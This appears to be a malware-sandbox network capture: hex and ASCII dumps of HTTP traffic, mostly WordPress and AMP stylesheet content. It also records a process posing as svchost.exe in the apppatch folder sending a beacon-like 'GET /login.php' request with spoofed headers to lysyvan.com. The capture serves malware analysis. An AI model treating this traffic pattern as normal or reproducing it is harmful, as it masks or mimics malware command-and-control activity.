                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79
                                                                                                                                                                                                            Data Ascii: ,e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65
                                                                                                                                                                                                            Data Ascii: nce:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74
                                                                                                                                                                                                            Data Ascii: ef='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31
                                                                                                                                                                                                            Data Ascii: ight:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61
                                                                                                                                                                                                            Data Ascii: d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.pa
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f
                                                                                                                                                                                                            Data Ascii: single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-po
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65
                                                                                                                                                                                                            Data Ascii: ]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigge
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 3a 66 6f 63 75 73 2c 23 61 73 74 2d 63 6f 75 70 6f 6e 2d 63 6f 64 65 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a
                                                                                                                                                                                                            Data Ascii: ontent .woocommerce form .form-row .select2-container--default .select2-selection--single:focus,#ast-coupon-code:focus,.woocommerce.woocommerce-js .quantity input[type=number]:focus,.woocommerce-js .woocommerce-mini-cart-item .quantity input[type=number]:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.455360188.114.96.34437524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC900INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:30 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="42.4",amp_style_sanitizer;dur="21.0",amp_tag_and_attribute_sanitizer;dur="17.8",amp_optimizer;dur="7.3"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP29DjZxQIHlIhf0dMgASlOMmyAkTcyB9GOHriyvsBeehzRJFaESz6LmLY%2FVVTOPapE9KebJxAHE0kOxpxFKJyjy7Q5Y%2BZsCEIo1d%2B8CJ8v8LknzCir%2BKfK6u4ehtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e622d134370-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC469INData Raw: 37 63 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c2d<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74
                                                                                                                                                                                                            Data Ascii: 000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c 6f 77 2d
                                                                                                                                                                                                            Data Ascii: tml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e
                                                                                                                                                                                                            Data Ascii: -background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d 61 6d 70
                                                                                                                                                                                                            Data Ascii: height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-amp
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c
                                                                                                                                                                                                            Data Ascii: ayout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;l
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69
                                                                                                                                                                                                            Data Ascii: yout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][hei
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30
                                                                                                                                                                                                            Data Ascii: display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0
                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e
                                                                                                                                                                                                            Data Ascii: form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordion
